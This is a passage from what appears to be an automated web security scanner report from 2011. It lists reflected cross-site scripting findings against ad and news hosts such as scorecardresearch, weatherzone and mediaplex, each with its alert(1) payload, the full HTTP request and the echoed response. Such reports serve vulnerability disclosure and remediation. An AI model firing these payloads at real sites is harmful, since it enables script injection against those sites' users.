COMSCORE.beacon({c1:"8", c2:"6864322", c3:"a046a<script>alert(1)</script>d230dd3e0c7", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.22. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 72c58<script>alert(1)</script>5135e87dd6a was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=72c58<script>alert(1)</script>5135e87dd6a&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"72c58<script>alert(1)</script>5135e87dd6a", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.23. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 495f7<script>alert(1)</script>80f8dd7325a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=495f7<script>alert(1)</script>80f8dd7325a&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"495f7<script>alert(1)</script>80f8dd7325a", c6:"", c10:"", c15:"", c16:"", r:""});



2.24. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9bb3e<script>alert(1)</script>b822407984 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=9bb3e<script>alert(1)</script>b822407984&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"9bb3e<script>alert(1)</script>b822407984", c10:"", c15:"", c16:"", r:""});



2.25. http://data.weatherzone.com.au/json/animator/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.weatherzone.com.au
Path:   /json/animator/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 589e8<script>alert(1)</script>d9ebc61394f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z&frames=4&callback=cbrad070589e8<script>alert(1)</script>d9ebc61394f HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1138
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:22 GMT
Date: Wed, 07 Sep 2011 14:17:12 GMT
Connection: close
Vary: Accept-Encoding


cbrad070589e8<script>alert(1)</script>d9ebc61394f({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "timestamp": 1315402200000, "times
...[SNIP]...

2.26. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba7da<script>alert(1)</script>f54888f1a38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1437
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090. Reason:
<pre>
...[SNIP]...

2.27. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0947<script>alert(1)</script>37466815b88 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjspf0947<script>alert(1)</script>37466815b88 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 11:23:25 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:19:58 GMT
Date: Wed, 07 Sep 2011 14:14:58 GMT
Content-Length: 5229
Connection: close
Vary: Accept-Encoding

_jqjspf0947<script>alert(1)</script>37466815b88({"$xmlns":{"pl1":"http://mps.theplatform.com/data/Account/178843232","dcterms":"http://purl.org/dc/terms/","media":"http://search.yahoo.com/mrss/","pl":"http://xml.theplatform.com/data/object","pla":"
...[SNIP]...

2.28. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ee248<script>alert(1)</script>d08ab2cad06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp&ee248<script>alert(1)</script>d08ab2cad06=1 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 14:14:59 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 5612

_jqjsp({"title":"BadParameterException","description":"'ee248<script>alert(1)</script>d08ab2cad06' is not a valid parameter.","isException":true,"responseCode":400,"serverStackTrace":"com.theplatform.module.exception.BadParameterException: 'ee248<script>
...[SNIP]...

2.29. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7187a"-alert(1)-"d3654a700b0 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5380
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1
...[SNIP]...

2.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f70'%3balert(1)//42938f6d53f was submitted in the mpck parameter. This input was echoed as 69f70';alert(1)//42938f6d53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b69f70'%3balert(1)//42938f6d53f&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:50 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b69f70';alert(1)//42938f6d53f" target="_blank">
...[SNIP]...

2.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c937c'%3balert(1)//5a180c5ccee was submitted in the mpvc parameter. This input was echoed as c937c';alert(1)//5a180c5ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3Dc937c'%3balert(1)//5a180c5ccee HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=c937c';alert(1)//5a180c5cceehttp://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b" target="_blank">
...[SNIP]...

2.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fa38"%3balert(1)//58a2ce83bc6 was submitted in the mpvc parameter. This input was echoed as 4fa38";alert(1)//58a2ce83bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D4fa38"%3balert(1)//58a2ce83bc6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=4fa38";alert(1)//58a2ce83bc6");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p
...[SNIP]...

2.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fecd"-alert(1)-"ad31c053526 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:40 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5370
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1
...[SNIP]...

2.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35585'%3balert(1)//18083999448 was submitted in the mpck parameter. This input was echoed as 35585';alert(1)//18083999448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

